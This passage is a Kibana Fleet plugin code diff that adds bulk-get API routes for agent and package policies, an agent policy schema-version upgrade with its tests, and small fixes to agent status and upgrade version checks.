$ref: paths/package_policies@delete.yaml /package_policies/upgrade: diff --git a/x-pack/plugins/fleet/common/openapi/paths/agent_policies@_bulk_get.yaml b/x-pack/plugins/fleet/common/openapi/paths/agent_policies@_bulk_get.yaml new file mode 100644 index 0000000000000..0ac58fffba167 --- /dev/null +++ b/x-pack/plugins/fleet/common/openapi/paths/agent_policies@_bulk_get.yaml @@ -0,0 +1,38 @@ +post: + summary: Agent policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of agent policy ids + full: + type: boolean + description: get full policies with package policies populated + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: ../components/schemas/agent_policy.yaml + required: + - items + operationId: bulk-get-agent-policies + security: [] + parameters: [] diff --git a/x-pack/plugins/fleet/common/openapi/paths/package_policies@_bulk_get.yaml b/x-pack/plugins/fleet/common/openapi/paths/package_policies@_bulk_get.yaml new file mode 100644 index 0000000000000..70d54b12e47eb --- /dev/null +++ b/x-pack/plugins/fleet/common/openapi/paths/package_policies@_bulk_get.yaml @@ -0,0 +1,35 @@ +post: + summary: Package policies - Bulk Get + tags: [] + requestBody: + content: + application/json: + schema: + type: object + properties: + ids: + type: array + items: + type: string + description: list of package policy ids + ignoreMissing: + type: boolean + required: + - ids + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + items: + type: array + items: + $ref: ../components/schemas/package_policy.yaml + required: + - items + operationId: bulk-get-package-policies + security: [] + parameters: [] diff --git a/x-pack/plugins/fleet/common/services/agent_status.ts b/x-pack/plugins/fleet/common/services/agent_status.ts index 59ec2b9babd70..7dbfb88192da8 100644 --- a/x-pack/plugins/fleet/common/services/agent_status.ts +++ b/x-pack/plugins/fleet/common/services/agent_status.ts @@ -6,11 +6,11 @@ */ import { AGENT_POLLING_THRESHOLD_MS } from '../constants'; -import type { Agent, AgentStatus } from '../types'; +import type { Agent, AgentStatus, FleetServerAgent } from '../types'; const offlineTimeoutIntervalCount = 10; // 30s*10 = 5m timeout -export function getAgentStatus(agent: Agent): AgentStatus { +export function getAgentStatus(agent: Agent | FleetServerAgent): AgentStatus { const { last_checkin: lastCheckIn } = agent; if (!agent.active) { @@ -33,7 +33,15 @@ export function getAgentStatus(agent: Agent): AgentStatus { if (agent.last_checkin_status === 'degraded') { return 'degraded'; } - if (agent.upgrade_started_at && !agent.upgraded_at) { + + const policyRevision = + 'policy_revision' in agent + ? agent.policy_revision + : 'policy_revision_idx' in agent + ? agent.policy_revision_idx + : undefined; + + if (!policyRevision || (agent.upgrade_started_at && !agent.upgraded_at)) { return 'updating'; } if (intervalsSinceLastCheckIn >= offlineTimeoutIntervalCount) { @@ -76,7 +84,7 @@ export function buildKueryForUpgradingAgents(path: string = '') { export function buildKueryForUpdatingAgents(path: string = '') { return `(${buildKueryForUpgradingAgents(path)}) or (${buildKueryForEnrollingAgents( path - )}) or (${buildKueryForUnenrollingAgents(path)})`; + )}) or (${buildKueryForUnenrollingAgents(path)}) or (not ${path}policy_revision_idx:*)`; } export function buildKueryForInactiveAgents(path: string = '') { diff --git a/x-pack/plugins/fleet/common/types/models/agent_policy.ts b/x-pack/plugins/fleet/common/types/models/agent_policy.ts index 40a6c8cdb9b48..44e6b35c02eec 100644 --- a/x-pack/plugins/fleet/common/types/models/agent_policy.ts +++ b/x-pack/plugins/fleet/common/types/models/agent_policy.ts @@ -29,6 +29,7 @@ export interface NewAgentPolicy { data_output_id?: string | null; monitoring_output_id?: string | null; download_source_id?: string | null; + schema_version?: string; } export interface AgentPolicy extends Omit { @@ -60,6 +61,7 @@ export interface FullAgentPolicyInput { type: string; data_stream: { namespace: string }; use_output: string; + package_policy_id: string; meta?: { package?: Pick; [key: string]: unknown; diff --git a/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts b/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts index d53da769c754b..a62b1a1b9e4e6 100644 --- a/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts +++ b/x-pack/plugins/fleet/common/types/rest_spec/agent_policy.ts @@ -7,7 +7,7 @@ import type { AgentPolicy, NewAgentPolicy, FullAgentPolicy } from '../models'; -import type { ListResult, ListWithKuery } from './common'; +import type { ListResult, ListWithKuery, BulkGetResult } from './common'; export interface GetAgentPoliciesRequest { query: ListWithKuery & { @@ -17,6 +17,7 @@ export interface GetAgentPoliciesRequest { export type GetAgentPoliciesResponseItem = AgentPolicy & { agents?: number }; +export type BulkGetAgentPoliciesResponse = BulkGetResult; export type GetAgentPoliciesResponse = ListResult; export interface GetOneAgentPolicyRequest { diff --git a/x-pack/plugins/fleet/common/types/rest_spec/common.ts b/x-pack/plugins/fleet/common/types/rest_spec/common.ts index 7a0390d830de3..07bd3c7019c16 100644 --- a/x-pack/plugins/fleet/common/types/rest_spec/common.ts +++ b/x-pack/plugins/fleet/common/types/rest_spec/common.ts @@ -21,3 +21,7 @@ export interface ListResult { page: number; perPage: number; } + +export interface BulkGetResult { + items: T[]; +} diff --git a/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts b/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts index 260c8ebc8142f..c7de1bd489b47 100644 --- a/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts +++ b/x-pack/plugins/fleet/common/types/rest_spec/package_policy.ts @@ -14,13 +14,14 @@ import type { FullAgentPolicyInput, } from '../models'; -import type { ListResult, ListWithKuery } from './common'; +import type { BulkGetResult, ListResult, ListWithKuery } from './common'; export interface GetPackagePoliciesRequest { query: ListWithKuery; } export type GetPackagePoliciesResponse = ListResult; +export type BulkGetPackagePoliciesResponse = BulkGetResult; export interface GetOnePackagePolicyRequest { params: { diff --git a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx index b87b09c7f58c4..f3023e718eacf 100644 --- a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx +++ b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_details_page/components/agent_details/agent_details_overview.tsx @@ -69,7 +69,7 @@ export const AgentDetailsOverviewSection: React.FunctionComponent<{ defaultMessage: 'Agent policy', }), description: agentPolicy ? ( - + ) : ( agent.policy_id || '-' ), diff --git a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx index 471c26f89123d..a9e3429732b3c 100644 --- a/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx +++ b/x-pack/plugins/fleet/public/applications/fleet/sections/agents/agent_list_page/index.tsx @@ -449,7 +449,7 @@ export const AgentListPage: React.FunctionComponent<{}> = () => { return ( - {agentPolicy && } + {agentPolicy && } {showWarning && ( diff --git a/x-pack/plugins/fleet/public/components/link_and_revision.test.tsx b/x-pack/plugins/fleet/public/components/link_and_revision.test.tsx new file mode 100644 index 0000000000000..f2d0a8970cfa3 --- /dev/null +++ b/x-pack/plugins/fleet/public/components/link_and_revision.test.tsx @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; + +import type { TestRenderer } from '../mock'; +import { createFleetTestRendererMock } from '../mock'; + +import type { AgentPolicy, Agent } from '../types'; + +import { AgentPolicySummaryLine } from './link_and_revision'; + +jest.mock('../hooks/use_fleet_status', () => ({ + FleetStatusProvider: (props: any) => { + return props.children; + }, + useFleetStatus: jest.fn().mockReturnValue({}), +})); + +describe('AgentPolicySummaryLine', () => { + let testRenderer: TestRenderer; + + const render = (agentPolicy: AgentPolicy, agent?: Agent) => + testRenderer.render(); + + beforeEach(() => { + testRenderer = createFleetTestRendererMock(); + }); + + test('it should render policy and revision if no agent is provided', async () => { + const results = render({ name: 'test', revision: 2 } as AgentPolicy); + expect(results.container.textContent).toBe('testrev. 2'); + }); + + test('it should render policy without revision if the agent do not have revision', async () => { + const results = render({ name: 'test', revision: 1 } as AgentPolicy, {} as Agent); + expect(results.container.textContent).toBe('test'); + }); + + test('it should render policy with agent revision if an agent is provided', async () => { + const results = render( + { name: 'test', revision: 2 } as AgentPolicy, + { policy_revision: 1 } as Agent + ); + expect(results.container.textContent).toBe('testrev. 1'); + }); +}); diff --git a/x-pack/plugins/fleet/public/components/link_and_revision.tsx b/x-pack/plugins/fleet/public/components/link_and_revision.tsx index b56787fbb399c..64d4fa043e160 100644 --- a/x-pack/plugins/fleet/public/components/link_and_revision.tsx +++ b/x-pack/plugins/fleet/public/components/link_and_revision.tsx @@ -11,49 +11,54 @@ import { FormattedMessage } from '@kbn/i18n-react'; import type { CSSProperties } from 'react'; import React, { memo } from 'react'; -import type { AgentPolicy } from '../../common/types'; +import type { AgentPolicy, Agent } from '../../common/types'; import { useLink } from '../hooks'; const MIN_WIDTH: CSSProperties = { minWidth: 0 }; const NO_WRAP_WHITE_SPACE: CSSProperties = { whiteSpace: 'nowrap' }; -export const AgentPolicySummaryLine = memo<{ policy: AgentPolicy }>(({ policy }) => { - const { getHref } = useLink(); - const { name, id, revision, is_managed: isManaged } = policy; - return ( - - - - {name || id} - - - {isManaged && ( - - )} - {revision && ( - - - - +export const AgentPolicySummaryLine = memo<{ policy: AgentPolicy; agent?: Agent }>( + ({ policy, agent }) => { + const { getHref } = useLink(); + const { name, id, is_managed: isManaged } = policy; + + const revision = agent ? agent.policy_revision : policy.revision; + + return ( + + + + {name || id} + - )} - - ); -}); + {isManaged && ( + + )} + {revision && ( + + + + + + )} + + ); + } +); diff --git a/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts b/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts index 8b9402054fb0a..001aa0caf6a47 100644 --- a/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts +++ b/x-pack/plugins/fleet/server/constants/fleet_es_assets.ts @@ -11,6 +11,8 @@ const meta = getESAssetMetadata(); export const FLEET_INSTALL_FORMAT_VERSION = '1.0.0'; +export const FLEET_AGENT_POLICIES_SCHEMA_VERSION = '1.0.0'; + export const FLEET_FINAL_PIPELINE_ID = '.fleet_final_pipeline-1'; export const FLEET_GLOBALS_COMPONENT_TEMPLATE_NAME = '.fleet_globals-1'; diff --git a/x-pack/plugins/fleet/server/constants/index.ts b/x-pack/plugins/fleet/server/constants/index.ts index 36f0cac1c4be8..87f0b5eeedfcf 100644 --- a/x-pack/plugins/fleet/server/constants/index.ts +++ b/x-pack/plugins/fleet/server/constants/index.ts @@ -76,4 +76,5 @@ export { FLEET_FINAL_PIPELINE_CONTENT, FLEET_FINAL_PIPELINE_VERSION, FLEET_INSTALL_FORMAT_VERSION, + FLEET_AGENT_POLICIES_SCHEMA_VERSION, } from './fleet_es_assets'; diff --git a/x-pack/plugins/fleet/server/errors/index.ts b/x-pack/plugins/fleet/server/errors/index.ts index d0aca78fce5ef..713804d8a36f7 100644 --- a/x-pack/plugins/fleet/server/errors/index.ts +++ b/x-pack/plugins/fleet/server/errors/index.ts @@ -54,6 +54,7 @@ export class ConcurrentInstallOperationError extends IngestManagerError {} export class AgentReassignmentError extends IngestManagerError {} export class PackagePolicyIneligibleForUpgradeError extends IngestManagerError {} export class PackagePolicyValidationError extends IngestManagerError {} +export class PackagePolicyNotFoundError extends IngestManagerError {} export class BundledPackageNotFoundError extends IngestManagerError {} export class HostedAgentPolicyRestrictionRelatedError extends IngestManagerError { constructor(message = 'Cannot perform that action') { diff --git a/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap b/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap index 4f77db4063dc0..c6b5aae0f1868 100644 --- a/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap +++ b/x-pack/plugins/fleet/server/integration_tests/__snapshots__/cloud_preconfiguration.test.ts.snap @@ -25,6 +25,7 @@ Object { }, }, "name": "Fleet Server", + "package_policy_id": "elastic-cloud-fleet-server", "revision": 1, "server": Object { "host": "0.0.0.0", @@ -122,6 +123,7 @@ Object { }, }, "name": "Elastic APM", + "package_policy_id": "elastic-cloud-apm", "revision": 1, "type": "apm", "use_output": "es-containerhost", diff --git a/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts b/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts index 60f68f135ba55..35c698675e7c9 100644 --- a/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts +++ b/x-pack/plugins/fleet/server/integration_tests/helpers/docker_registry_helper.ts @@ -18,7 +18,7 @@ import pRetry from 'p-retry'; const BEFORE_SETUP_TIMEOUT = 30 * 60 * 1000; // 30 minutes; const DOCKER_START_TIMEOUT = 5 * 60 * 1000; // 5 minutes -const DOCKER_IMAGE = `docker.elastic.co/package-registry/distribution:433d99a96f3289c5013ae35826877adf408eb9c9`; +const DOCKER_IMAGE = `docker.elastic.co/package-registry/distribution:production-v2-experimental`; function firstWithTimeout(source$: Rx.Observable, errorMsg: string, ms = 30 * 1000) { return Rx.race( diff --git a/x-pack/plugins/fleet/server/integration_tests/upgrade_agent_policy_schema_version.test.ts b/x-pack/plugins/fleet/server/integration_tests/upgrade_agent_policy_schema_version.test.ts new file mode 100644 index 0000000000000..39c3cee2fdeb1 --- /dev/null +++ b/x-pack/plugins/fleet/server/integration_tests/upgrade_agent_policy_schema_version.test.ts @@ -0,0 +1,178 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import uuid from 'uuid/v4'; + +import type { + KibanaRequest, + SavedObjectsClientContract, + ElasticsearchClient, +} from '@kbn/core/server'; +import * as kbnTestServer from '@kbn/core/test_helpers/kbn_server'; +import type { SearchTotalHits } from '@elastic/elasticsearch/lib/api/types'; + +import { AGENT_POLICY_SAVED_OBJECT_TYPE, FLEET_AGENT_POLICIES_SCHEMA_VERSION } from '../constants'; +import { upgradeAgentPolicySchemaVersion } from '../services/setup/upgrade_agent_policy_schema_version'; +import { AGENT_POLICY_INDEX } from '../../common'; +import { agentPolicyService } from '../services'; + +import { useDockerRegistry, waitForFleetSetup } from './helpers'; + +const fakeRequest = { + headers: {}, + getBasePath: () => '', + path: '/', + route: { settings: {} }, + url: { + href: '/', + }, + raw: { + req: { + url: '/', + }, + }, +} as unknown as KibanaRequest; + +describe('upgrade agent policy schema version', () => { + let esServer: kbnTestServer.TestElasticsearchUtils; + let kbnServer: kbnTestServer.TestKibanaUtils; + + const registryUrl = useDockerRegistry(); + + const startServers = async () => { + const { startES } = kbnTestServer.createTestServers({ + adjustTimeout: (t) => jest.setTimeout(t), + settings: { + es: { + license: 'trial', + }, + kbn: {}, + }, + }); + + esServer = await startES(); + const startKibana = async () => { + const root = kbnTestServer.createRootWithCorePlugins( + { + xpack: { + fleet: { + registryUrl, + packages: [ + { + name: 'fleet_server', + version: 'latest', + }, + { + name: 'system', + version: 'latest', + }, + ], + }, + }, + }, + { oss: false } + ); + + await root.preboot(); + const coreSetup = await root.setup(); + const coreStart = await root.start(); + + return { + root, + coreSetup, + coreStart, + stop: async () => await root.shutdown(), + }; + }; + kbnServer = await startKibana(); + + await waitForFleetSetup(kbnServer.root); + }; + + const stopServers = async () => { + if (kbnServer) { + await kbnServer.stop(); + } + + if (esServer) { + await esServer.stop(); + } + + await new Promise((res) => setTimeout(res, 10000)); + }; + + // Share the same servers for all the test to make test a lot faster (but test are not isolated anymore) + beforeAll(async () => { + await startServers(); + }); + + afterAll(async () => { + await stopServers(); + }); + + describe('with package installed with outdated schema version', () => { + let soClient: SavedObjectsClientContract; + let esClient: ElasticsearchClient; + + beforeAll(async () => { + soClient = kbnServer.coreStart.savedObjects.getScopedClient(fakeRequest, { + excludedWrappers: ['security'], + }); + esClient = kbnServer.coreStart.elasticsearch.client.asInternalUser; + }); + + it('should correctly upgrade schema version', async () => { + await esClient.indices.create({ index: AGENT_POLICY_INDEX }); + let esRes = await esClient.search({ index: AGENT_POLICY_INDEX }); + expect((esRes.hits.total as SearchTotalHits).value).toBe(0); + + await soClient.bulkCreate([ + // up-to-date schema_version + { + type: AGENT_POLICY_SAVED_OBJECT_TYPE, + id: uuid(), + attributes: { + schema_version: FLEET_AGENT_POLICIES_SCHEMA_VERSION, + revision: 1, + }, + }, + // out-of-date schema_version + { + type: AGENT_POLICY_SAVED_OBJECT_TYPE, + id: uuid(), + attributes: { + schema_version: '0.0.1', + revision: 1, + }, + }, + // missing schema_version + { + type: AGENT_POLICY_SAVED_OBJECT_TYPE, + id: uuid(), + attributes: { + revision: 1, + }, + }, + ]); + + await upgradeAgentPolicySchemaVersion(soClient); + + const policies = await agentPolicyService.list(soClient, { + kuery: `${AGENT_POLICY_SAVED_OBJECT_TYPE}.schema_version:${FLEET_AGENT_POLICIES_SCHEMA_VERSION}`, + }); + // all 3 should be up-to-date after upgrade + expect(policies.total).toBe(3); + + esRes = await esClient.search({ + index: AGENT_POLICY_INDEX, + body: { query: { match: { revision_idx: 2 } } }, + }); + // since only 2 were updated, only 2 should be written + expect((esRes.hits.total as SearchTotalHits).value).toBe(2); + }); + }); +}); diff --git a/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts b/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts index 6b5f3efeae538..79388d7d5b914 100644 --- a/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts +++ b/x-pack/plugins/fleet/server/integration_tests/validate_bundled_packages.test.ts @@ -37,23 +37,32 @@ describe('validate bundled packages', () => { } async function setupPackageObjects() { + // APM is a special case package in that it's "bundled release" is not available + // on the v2 registry image, because v2 currently only contains production packages. + // We bundle APM from snapshot, but that bundled version isn't available in the docker + // image that's running EPR during FTR runs, so to avoid nasty test failures we don't + // verify APM here. + const EXCLUDED_PACKAGES = ['apm']; + const bundledPackages = await getBundledPackageEntries(); const packageObjects = await Promise.all( - bundledPackages.map(async (bundledPackage) => { - const registryPackage = await Registry.getRegistryPackage( - bundledPackage.name, - bundledPackage.version - ); - - const packageArchive = await Registry.fetchArchiveBuffer({ - pkgName: bundledPackage.name, - pkgVersion: bundledPackage.version, - shouldVerify: false, - }); - - return { registryPackage, packageArchive }; - }) + bundledPackages + .filter((pkg) => !EXCLUDED_PACKAGES.includes(pkg.name)) + .map(async (bundledPackage) => { + const registryPackage = await Registry.getRegistryPackage( + bundledPackage.name, + bundledPackage.version + ); + + const packageArchive = await Registry.fetchArchiveBuffer({ + pkgName: bundledPackage.name, + pkgVersion: bundledPackage.version, + shouldVerify: false, + }); + + return { registryPackage, packageArchive }; + }) ); return packageObjects; diff --git a/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.test.ts b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.test.ts new file mode 100644 index 0000000000000..5eafcf1a94104 --- /dev/null +++ b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.test.ts @@ -0,0 +1,26 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { checkKibanaVersion } from './upgrade_handler'; + +describe('upgrade handler', () => { + describe('checkKibanaVersion', () => { + it('should not throw if upgrade version is equal to kibana version', () => { + expect(() => checkKibanaVersion('8.4.0', '8.4.0')).not.toThrowError(); + }); + + it('should throw if upgrade version is higher than kibana version', () => { + expect(() => checkKibanaVersion('8.5.0', '8.4.0')).toThrowError( + 'cannot upgrade agent to 8.5.0 because it is higher than the installed kibana version 8.4.0' + ); + }); + + it('should not throw if upgrade version is equal to kibana version with snapshot', () => { + expect(() => checkKibanaVersion('8.4.0', '8.4.0-SNAPSHOT')).not.toThrowError(); + }); + }); +}); diff --git a/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts index 024158b5b8785..d75e3ad07d9b8 100644 --- a/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts +++ b/x-pack/plugins/fleet/server/routes/agent/upgrade_handler.ts @@ -160,7 +160,7 @@ export const checkKibanaVersion = (version: string, kibanaVersion: string) => { if (!versionToUpgradeNumber) throw new Error(`version to upgrade ${versionToUpgradeNumber} is not valid`); - if (semverGt(version, kibanaVersion)) + if (semverGt(versionToUpgradeNumber, kibanaVersionNumber)) throw new Error( `cannot upgrade agent to ${versionToUpgradeNumber} because it is higher than the installed kibana version ${kibanaVersionNumber}` ); diff --git a/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts b/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts index 0f632dfbb9cff..8235c3c3348b2 100644 --- a/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts +++ b/x-pack/plugins/fleet/server/routes/agent_policy/handlers.ts @@ -6,7 +6,7 @@ */ import type { TypeOf } from '@kbn/config-schema'; -import type { RequestHandler, ResponseHeaders } from '@kbn/core/server'; +import type { RequestHandler, ResponseHeaders, ElasticsearchClient } from '@kbn/core/server'; import pMap from 'p-map'; import { safeDump } from 'js-yaml'; @@ -24,6 +24,8 @@ import type { GetFullAgentPolicyRequestSchema, GetK8sManifestRequestSchema, FleetRequestHandler, + BulkGetAgentPoliciesRequestSchema, + AgentPolicy, } from '../../types'; import type { @@ -37,10 +39,28 @@ import type { GetFullAgentPolicyResponse, GetFullAgentConfigMapResponse, GetFullAgentManifestResponse, + BulkGetAgentPoliciesResponse, } from '../../../common/types'; -import { defaultIngestErrorHandler } from '../../errors'; +import { defaultIngestErrorHandler, AgentPolicyNotFoundError } from '../../errors'; import { createAgentPolicyWithPackages } from '../../services/agent_policy_create'; +async function populateAssignedAgentsCount( + esClient: ElasticsearchClient, + agentPolicies: AgentPolicy[] +) { + await pMap( + agentPolicies, + (agentPolicy: GetAgentPoliciesResponseItem) => + getAgentsByKuery(esClient, { + showInactive: false, + perPage: 0, + page: 1, + kuery: `${AGENTS_PREFIX}.policy_id:${agentPolicy.id}`, + }).then(({ total: agentTotal }) => (agentPolicy.agents = agentTotal)), + { concurrency: 10 } + ); +} + export const getAgentPoliciesHandler: FleetRequestHandler< undefined, TypeOf @@ -62,20 +82,45 @@ export const getAgentPoliciesHandler: FleetRequestHandler< perPage, }; - await pMap( + await populateAssignedAgentsCount(esClient, items); + + return response.ok({ body }); + } catch (error) { + return defaultIngestErrorHandler({ error, response }); + } +}; + +export const bulkGetAgentPoliciesHandler: FleetRequestHandler< + undefined, + undefined, + TypeOf +> = async (context, request, response) => { + const coreContext = await context.core; + const fleetContext = await context.fleet; + const soClient = fleetContext.epm.internalSoClient; + const esClient = coreContext.elasticsearch.client.asInternalUser; + const { full: withPackagePolicies = false, ignoreMissing = false, ids } = request.body; + try { + const items = await agentPolicyService.getByIDs(soClient, ids, { + withPackagePolicies, + ignoreMissing, + }); + const body: BulkGetAgentPoliciesResponse = { items, - (agentPolicy: GetAgentPoliciesResponseItem) => - getAgentsByKuery(esClient, { - showInactive: false, - perPage: 0, - page: 1, - kuery: `${AGENTS_PREFIX}.policy_id:${agentPolicy.id}`, - }).then(({ total: agentTotal }) => (agentPolicy.agents = agentTotal)), - { concurrency: 10 } - ); + }; + + await populateAssignedAgentsCount(esClient, items); return response.ok({ body }); } catch (error) { + if (error instanceof AgentPolicyNotFoundError) { + return response.notFound({ + body: { + message: error.message, + }, + }); + } + return defaultIngestErrorHandler({ error, response }); } }; diff --git a/x-pack/plugins/fleet/server/routes/agent_policy/index.ts b/x-pack/plugins/fleet/server/routes/agent_policy/index.ts index b42799d738d4c..938d8b3332b71 100644 --- a/x-pack/plugins/fleet/server/routes/agent_policy/index.ts +++ b/x-pack/plugins/fleet/server/routes/agent_policy/index.ts @@ -15,6 +15,7 @@ import { DeleteAgentPolicyRequestSchema, GetFullAgentPolicyRequestSchema, GetK8sManifestRequestSchema, + BulkGetAgentPoliciesRequestSchema, } from '../../types'; import type { FleetAuthzRouter } from '../security'; @@ -31,6 +32,7 @@ import { downloadFullAgentPolicy, downloadK8sManifest, getK8sManifest, + bulkGetAgentPoliciesHandler, } from './handlers'; export const registerRoutes = (router: FleetAuthzRouter) => { @@ -46,6 +48,18 @@ export const registerRoutes = (router: FleetAuthzRouter) => { getAgentPoliciesHandler ); + // Bulk GET + router.post( + { + path: AGENT_POLICY_API_ROUTES.BULK_GET_PATTERN, + validate: BulkGetAgentPoliciesRequestSchema, + fleetAuthz: { + fleet: { readAgentPolicies: true }, + }, + }, + bulkGetAgentPoliciesHandler + ); + // Get one router.get( { diff --git a/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts b/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts index 222408c6e0524..5e67857540143 100644 --- a/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts +++ b/x-pack/plugins/fleet/server/routes/package_policy/handlers.test.ts @@ -138,8 +138,8 @@ describe('When calling package policy', () => { // Set the routeConfig and routeHandler to the Create API beforeEach(() => { - [routeConfig, routeHandler] = routerMock.post.mock.calls.find(([{ path }]) => - path.startsWith(PACKAGE_POLICY_API_ROUTES.CREATE_PATTERN) + [routeConfig, routeHandler] = routerMock.post.mock.calls.find( + ([{ path }]) => path === PACKAGE_POLICY_API_ROUTES.CREATE_PATTERN )!; }); diff --git a/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts b/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts index 8ecbd11ec5986..0b5f71910cfa9 100644 --- a/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts +++ b/x-pack/plugins/fleet/server/routes/package_policy/handlers.ts @@ -25,8 +25,10 @@ import type { FleetRequestHandler, PackagePolicy, DeleteOnePackagePolicyRequestSchema, + BulkGetPackagePoliciesRequestSchema, } from '../../types'; import type { + BulkGetPackagePoliciesResponse, CreatePackagePolicyResponse, DeletePackagePoliciesResponse, NewPackagePolicy, @@ -34,7 +36,7 @@ import type { UpgradePackagePolicyResponse, } from '../../../common/types'; import { installationStatuses } from '../../../common/constants'; -import { defaultIngestErrorHandler } from '../../errors'; +import { defaultIngestErrorHandler, PackagePolicyNotFoundError } from '../../errors'; import { getInstallations } from '../../services/epm/packages'; import { PACKAGES_SAVED_OBJECT_TYPE, SO_SEARCH_LIMIT } from '../../constants'; @@ -61,6 +63,34 @@ export const getPackagePoliciesHandler: RequestHandler< } }; +export const bulkGetPackagePoliciesHandler: RequestHandler< + undefined, + undefined, + TypeOf +> = async (context, request, response) => { + const soClient = (await context.core).savedObjects.client; + const { ids, ignoreMissing } = request.body; + try { + const items = await packagePolicyService.getByIDs(soClient, ids, { + ignoreMissing, + }); + + const body: BulkGetPackagePoliciesResponse = { items: items ?? [] }; + + return response.ok({ + body, + }); + } catch (error) { + if (error instanceof PackagePolicyNotFoundError) { + return response.notFound({ + body: { message: error.message }, + }); + } + + return defaultIngestErrorHandler({ error, response }); + } +}; + export const getOnePackagePolicyHandler: RequestHandler< TypeOf > = async (context, request, response) => { diff --git a/x-pack/plugins/fleet/server/routes/package_policy/index.ts b/x-pack/plugins/fleet/server/routes/package_policy/index.ts index cf52b740245f8..004037623bb0d 100644 --- a/x-pack/plugins/fleet/server/routes/package_policy/index.ts +++ b/x-pack/plugins/fleet/server/routes/package_policy/index.ts @@ -15,6 +15,7 @@ import { UpgradePackagePoliciesRequestSchema, DryRunPackagePoliciesRequestSchema, DeleteOnePackagePolicyRequestSchema, + BulkGetPackagePoliciesRequestSchema, } from '../../types'; import type { FleetAuthzRouter } from '../security'; @@ -28,6 +29,7 @@ import { dryRunUpgradePackagePolicyHandler, getOrphanedPackagePolicies, deleteOnePackagePolicyHandler, + bulkGetPackagePoliciesHandler, } from './handlers'; export const registerRoutes = (router: FleetAuthzRouter) => { @@ -43,6 +45,17 @@ export const registerRoutes = (router: FleetAuthzRouter) => { getPackagePoliciesHandler ); + router.post( + { + path: PACKAGE_POLICY_API_ROUTES.BULK_GET_PATTERN, + validate: BulkGetPackagePoliciesRequestSchema, + fleetAuthz: { + integrations: { readIntegrationPolicies: true }, + }, + }, + bulkGetPackagePoliciesHandler + ); + // Get one router.get( { diff --git a/x-pack/plugins/fleet/server/saved_objects/index.ts b/x-pack/plugins/fleet/server/saved_objects/index.ts index 0ccac385155b5..652a30d174190 100644 --- a/x-pack/plugins/fleet/server/saved_objects/index.ts +++ b/x-pack/plugins/fleet/server/saved_objects/index.ts @@ -84,6 +84,7 @@ const getSavedObjectTypes = ( mappings: { properties: { name: { type: 'keyword' }, + schema_version: { type: 'version' }, description: { type: 'text' }, namespace: { type: 'keyword' }, is_managed: { type: 'boolean' }, diff --git a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts index a3c4f7754f5fa..82a7612cc8195 100644 --- a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts +++ b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.test.ts @@ -183,6 +183,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ 